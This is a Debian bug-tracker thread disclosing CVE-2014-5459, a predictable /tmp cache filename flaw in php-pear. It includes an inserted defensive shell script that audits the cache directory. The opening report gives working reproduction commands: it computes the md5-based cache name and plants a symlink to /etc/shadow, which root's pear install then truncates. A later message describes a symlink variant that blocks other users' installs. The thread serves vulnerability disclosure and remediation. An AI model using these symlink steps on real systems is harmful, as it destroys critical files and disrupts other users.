#759282 [php-pear] "/tmp" symlink file clobbering (CVE-2014-5459)

#759282#5
Date:
2014-08-25 19:28:44 UTC
From:
To:
Package: php-pear
Version: 5.4.4-14+deb7u14
Tags: security

PEAR commands such as "pear install [...]" write cache data into
predictable filenames located in "/tmp/".  Unprivileged local users
could use symlinks to clobber arbitrary files.

Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
the code below.  They are predictable as long as we know the extension
name that is going to be installed (this name is used to construct the
url for the MD5 checksum):

    $ cat -n /usr/share/php/PEAR/REST.php
    [...]
    59         $cachefile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
    60             md5($url) . 'rest.cachefile';
    [...]
    194        $cacheidfile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
    195            md5($url) . 'rest.cacheid';

For instance, when installing the "Mail_mime" extension, the following
filenames are used by PEAR:

  - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
  - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid

In this case, the "$url" used for md5 checksum is the following:

    $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
    ff051dc5b96c95bf60e300d415b6c47e  -

To sum up, if a local user wants to clobber the "/etc/shadow" file, he
runs:

    $ mkdir -p /tmp/pear/cache/
    $ ln -s /etc/shadow /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile

Then when root runs PEAR, the file gets clobbered:

    # pear install Mail_mime
    [...]
    # du -sk /etc/shadow
    0	/etc/shadow

A function like tempnam() could be used instead.  It creates a file with
a unique filename (see http://php.net/manual/en/function.tempnam.php).

Regards,
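
An added example (not code from the report or from PEAR itself) in shell: it rebuilds the predictable cache name from a package name, as the report describes, and audits a cache directory for planted symlinks or foreign-owned entries before a privileged pear run. The demo directory is constructed under mktemp and the helper names are assumptions.

```shell
#!/bin/sh
# Added example, not code from the bug report or from PEAR.
set -u

# Rebuild the cache file name PEAR derives from a package's REST info URL:
# md5 of the URL followed by a fixed suffix (see the REST.php excerpt).
pear_cache_name() {
    pkg=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    hash=$(printf 'http://pear.php.net/rest/p/%s/info.xml' "$pkg" | md5sum | cut -d ' ' -f 1)
    printf '%s%s\n' "$hash" "$2"
}

# Print every entry in a cache dir that is a symlink or is not owned by the
# caller; return 1 if any such entry exists, 0 if the directory is clean.
audit_cache_dir() {
    dir=$1
    me=$(id -u)
    bad=0
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # empty dir: glob stays literal
        if [ -L "$f" ]; then
            printf 'SYMLINK %s -> %s\n' "$f" "$(readlink "$f")"
            bad=1
        elif [ "$(stat -c %u "$f")" != "$me" ]; then
            printf 'FOREIGN-OWNER %s\n' "$f"
            bad=1
        fi
    done
    return $bad
}

# Constructed demo: a private scratch dir standing in for /tmp/pear/cache,
# holding one genuine cache file and one planted symlink (dangling target).
demo_cache_dir() {
    d=$(mktemp -d)
    : > "$d/$(pear_cache_name Mail_mime rest.cachefile)"      # genuine entry
    ln -s "$d/target.txt" "$d/$(pear_cache_name Mail_mime rest.cacheid)"
    printf '%s\n' "$d"
}

# Stand-alone run: audit the constructed directory and clean it up.
if [ "${1:-}" = "demo" ]; then
    d=$(demo_cache_dir)
    audit_cache_dir "$d" || echo "cache dir $d is NOT safe to use as root"
    rm -rf "$d"
fi
```

Pointing pear at a per-user directory (`pear config-set cache_dir "$HOME/.pear/cache"`) removes the shared /tmp location altogether, which is the simpler mitigation on multi-user hosts.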

#759282#10
Date:
2014-08-26 04:50:09 UTC
From:
To:
Hello,

It was reported that the pear utility insecurely used the /tmp/
directory for cache data. A local attacker could use this flaw to
perform a symbolic link attack against a user (typically the root user)
running a pear command (such as "pear install").

Original report:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=759282

Could a CVE please be assigned?

Thanks,

#759282#15
Date:
2014-08-26 09:20:14 UTC
From:
To:
Yes, it's a known bug that php-pear is not safe on multiuser systems.

Ondrej

#759282#24
Date:
2014-08-27 05:24:20 UTC
From:
To:
Use CVE-2014-5459.

#759282#29
Date:
2015-11-07 13:25:32 UTC
From:
To:
Version: 5.3.6-1

Hello,

According to https://pear.php.net/bugs/bug.php?id=18056, it's fixed since 1.9.2.

Regards

#759282#38
Date:
2015-11-07 14:05:43 UTC
From:
To:
Hi Mathieu,

is this true? I just did a quick check (not a full analysis) and it
still seems to use /tmp/pear.

Can you check if the upstream bug report might be pointing to the
wrong fixing version?

(I have reopened the bugs for now)

Regards,
Salvatore

#759282#43
Date:
2015-11-07 14:53:07 UTC
From:
To:
2015-11-07 15:05 GMT+01:00 Salvatore Bonaccorso <carnil@debian.org>:

This even introduced a regression on Windows:
https://pear.php.net/bugs/bug.php?id=18834
https://github.com/pear/pear-core/commit/38de9355e3a9c66445a6d39d2c9a20f73e986d9a
(which is in 1.9.2)

And further improvement in:
https://github.com/pear/pear-core/commit/cd31da7d8b5e684f177a8fe700339f7eb2420876
(which is in 1.9.3)

Can we close it then?

Regards

#759282#52
Date:
2015-11-08 06:25:07 UTC
From:
To:
Hi Mathieu,
you cannot clobber someone else's files anymore. A user can block another
user this way.

As user foo do:

foo@sid:~$ pear download HTML_Common2
downloading HTML_Common2-2.1.1.tgz ...
Starting to download HTML_Common2-2.1.1.tgz (8,604 bytes)
.....done: 8,604 bytes
File /home/foo/HTML_Common2-2.1.1.tgz downloaded


Then replace the cache files with symlinks (e.g. to files in the home of
user bar, since he wants to try to clobber these files). bar now is
unable to pear download HTML_Common2:

bar@sid:~$ pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in /usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
bar@sid:~$ ls
bar@sid:~$

or as root

root@sid:~# pear download HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
download failed
root@sid:~# pear install HTML_Common2

Notice: unserialize(): Error at offset 0 of 220 bytes in PEAR/REST.php
on line 203
PHP Notice:  unserialize(): Error at offset 0 of 220 bytes in
/usr/share/php/PEAR/REST.php on line 203
No releases available for package "pear.php.net/HTML_Common2"
install failed
root@sid:~#

So again, I don't think the issues with unsafe use of /tmp are fixed
correctly and the bugs should not be closed. PHP maintainers, what do
you think (Ondřej cc'ed)?

Regards,
Salvatore

#759282#62
Date:
2015-11-09 06:17:24 UTC
From:
To:
2015-11-08 7:25 GMT+01:00 Salvatore Bonaccorso <carnil@debian.org>:

Hi Salvatore,

I didn't want to close it, but my Reply-to-all went to the -done addresses.

Which pear version are you testing?

Note that I'll be the php-pear maintainer, once the new package [1] is finished.

We should test against this latest 1.10 and report upstream if the bug remains.

[1]: anonscm.debian.org/cgit/pkg-php/php-pear.git

Regards

#759282#67
Date:
2015-11-14 18:18:52 UTC
From:
To:
Hi Mathieu,

Just to confirm, this was with php-pear provided from src:php5,
Version 5.6.14+dfsg-1.

Ack, yes I see.

Regards and thanks for your work there!

Salvatore